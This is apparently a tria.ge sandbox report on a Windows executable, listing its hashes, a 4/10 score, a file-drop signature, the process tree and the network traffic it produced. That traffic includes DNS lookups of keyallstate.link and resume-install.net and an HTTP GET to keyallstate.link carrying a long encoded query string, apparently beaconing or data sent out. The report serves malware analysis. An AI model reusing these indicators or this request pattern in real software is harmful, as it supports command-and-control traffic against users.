Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

6

Static

static

b4cea161d9...f2.exe

windows7-x64

6

b4cea161d9...f2.exe

windows10-2004-x64

4

Analysis

  • max time kernel
    123s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2022, 13:01 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe

  • Size

    299KB

  • MD5

    6e6fcd19e67d8595f121ac8e0a5957f1

  • SHA1

    100a09c48f837f18701c56da52ad713f3a323e95

  • SHA256

    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2

  • SHA512

    dca76ba5ae9b1fb755c301cef1890d78000b7e17933ac2fb3db3a6bb8240be9f737cb13472c578ae03a77417c24be8fe6765f6683fce260270e0d3aa539c2b8f

  • SSDEEP

    6144:awZI24IrBnYyhom8wJnroRMAVsHtj5HZ09h:awGqJoWJnreMASH3+9h

Score
4/10

Malware Config

Signatures

  • Drops file in Windows directory 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    "C:\Users\Admin\AppData\Local\Temp\b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe"
    1⤵
    • Drops file in Windows directory
    PID:4640

Network

  • flag-us
    DNS
    keyallstate.link
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    Remote address:
    8.8.8.8:53
    Request
    keyallstate.link
    IN A
    Response
    keyallstate.link
    IN A
    58.158.177.102
  • flag-us
    DNS
    resume-install.net
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    Remote address:
    8.8.8.8:53
    Request
    resume-install.net
    IN A
    Response
  • flag-jp
    GET
    http://keyallstate.link/?q=MuwgPur20NxuL0dSUMpfRAn8UokFeqex1lfzINRf7gvPVYA9Y14XGIErYWBHohMB21zG8jtXcIErNoB5emqiCtmNVPGe2g7sMa%2FXtjNdq3lWi0C0T71IvRO72KZUmGJFRIYnh%2BJy8vJswj4QBytKMbuqvVeEDQsmQRjqH%2Fk4YOWSImWjnz5FTqOzJn%2BKftTmzqfH5WIoaIwZYWwmJ9LLozCckbJJ1%2FS5I4JjnEgnNmrOrN4IZFTd9Ptf%2FcIR3A%2FldS%2FIE2moNZ2EB5G%2BSQdb1b4VIrRWcpnkgSr%2BjWv86FqQFpX19goMjfrJLPHzNRKtcq5ULeWqw3ZYH0bqp66p1YZ%2BTSb5x%2Fmr4Zr0Fw6mNxARZkM6Q1Q502A03ck89FsSm4JAHby8
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    Remote address:
    58.158.177.102:80
    Request
    GET /?q=MuwgPur20NxuL0dSUMpfRAn8UokFeqex1lfzINRf7gvPVYA9Y14XGIErYWBHohMB21zG8jtXcIErNoB5emqiCtmNVPGe2g7sMa%2FXtjNdq3lWi0C0T71IvRO72KZUmGJFRIYnh%2BJy8vJswj4QBytKMbuqvVeEDQsmQRjqH%2Fk4YOWSImWjnz5FTqOzJn%2BKftTmzqfH5WIoaIwZYWwmJ9LLozCckbJJ1%2FS5I4JjnEgnNmrOrN4IZFTd9Ptf%2FcIR3A%2FldS%2FIE2moNZ2EB5G%2BSQdb1b4VIrRWcpnkgSr%2BjWv86FqQFpX19goMjfrJLPHzNRKtcq5ULeWqw3ZYH0bqp66p1YZ%2BTSb5x%2Fmr4Zr0Fw6mNxARZkM6Q1Q502A03ck89FsSm4JAHby8 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
    Host: keyallstate.link
    Response
    HTTP/1.1 200 OK
    Date: Tue, 11 Oct 2022 17:58:52 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
    Last-Modified: Mon, 30 Nov 2015 13:48:40 GMT
    ETag: "9-525c24c725e00"
    Accept-Ranges: bytes
    Content-Length: 9
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    164.2.77.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    164.2.77.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    106.89.54.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    106.89.54.20.in-addr.arpa
    IN PTR
    Response
  • 178.79.208.1:80
    156 B
     3
  • 93.184.220.29:80
    322 B
     7
  • 58.158.177.102:80
    http://keyallstate.link/?q=MuwgPur20NxuL0dSUMpfRAn8UokFeqex1lfzINRf7gvPVYA9Y14XGIErYWBHohMB21zG8jtXcIErNoB5emqiCtmNVPGe2g7sMa%2FXtjNdq3lWi0C0T71IvRO72KZUmGJFRIYnh%2BJy8vJswj4QBytKMbuqvVeEDQsmQRjqH%2Fk4YOWSImWjnz5FTqOzJn%2BKftTmzqfH5WIoaIwZYWwmJ9LLozCckbJJ1%2FS5I4JjnEgnNmrOrN4IZFTd9Ptf%2FcIR3A%2FldS%2FIE2moNZ2EB5G%2BSQdb1b4VIrRWcpnkgSr%2BjWv86FqQFpX19goMjfrJLPHzNRKtcq5ULeWqw3ZYH0bqp66p1YZ%2BTSb5x%2Fmr4Zr0Fw6mNxARZkM6Q1Q502A03ck89FsSm4JAHby8
    http
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    882 B
     452 B
     6
    4

    HTTP Request

    GET http://keyallstate.link/?q=MuwgPur20NxuL0dSUMpfRAn8UokFeqex1lfzINRf7gvPVYA9Y14XGIErYWBHohMB21zG8jtXcIErNoB5emqiCtmNVPGe2g7sMa%2FXtjNdq3lWi0C0T71IvRO72KZUmGJFRIYnh%2BJy8vJswj4QBytKMbuqvVeEDQsmQRjqH%2Fk4YOWSImWjnz5FTqOzJn%2BKftTmzqfH5WIoaIwZYWwmJ9LLozCckbJJ1%2FS5I4JjnEgnNmrOrN4IZFTd9Ptf%2FcIR3A%2FldS%2FIE2moNZ2EB5G%2BSQdb1b4VIrRWcpnkgSr%2BjWv86FqQFpX19goMjfrJLPHzNRKtcq5ULeWqw3ZYH0bqp66p1YZ%2BTSb5x%2Fmr4Zr0Fw6mNxARZkM6Q1Q502A03ck89FsSm4JAHby8

    HTTP Response

    200
  • 104.80.225.205:443
    322 B
     7
  • 20.42.73.26:443
    322 B
     7
  • 8.8.8.8:53
    keyallstate.link
    dns
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    62 B
     78 B
     1
    1

    DNS Request

    keyallstate.link

    DNS Response

    58.158.177.102

  • 8.8.8.8:53
    resume-install.net
    dns
    b4cea161d9c037efe9a5743a51569fa048e3e43be58b29605ba72a1e2a7e94f2.exe
    64 B
     137 B
     1
    1

    DNS Request

    resume-install.net

  • 8.8.8.8:53
    164.2.77.40.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    164.2.77.40.in-addr.arpa

  • 8.8.8.8:53
    106.89.54.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    106.89.54.20.in-addr.arpa

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4640-132-0x0000000000140000-0x0000000000171000-memory.dmp

    Filesize

    196KB

    Download

  • memory/4640-133-0x00000000008A0000-0x00000000008CF000-memory.dmp

    Filesize

    188KB

    Download

  • memory/4640-137-0x0000000000140000-0x0000000000171000-memory.dmp

    Filesize

    196KB

    Download

  • memory/4640-138-0x0000000000140000-0x0000000000171000-memory.dmp

    Filesize

    196KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.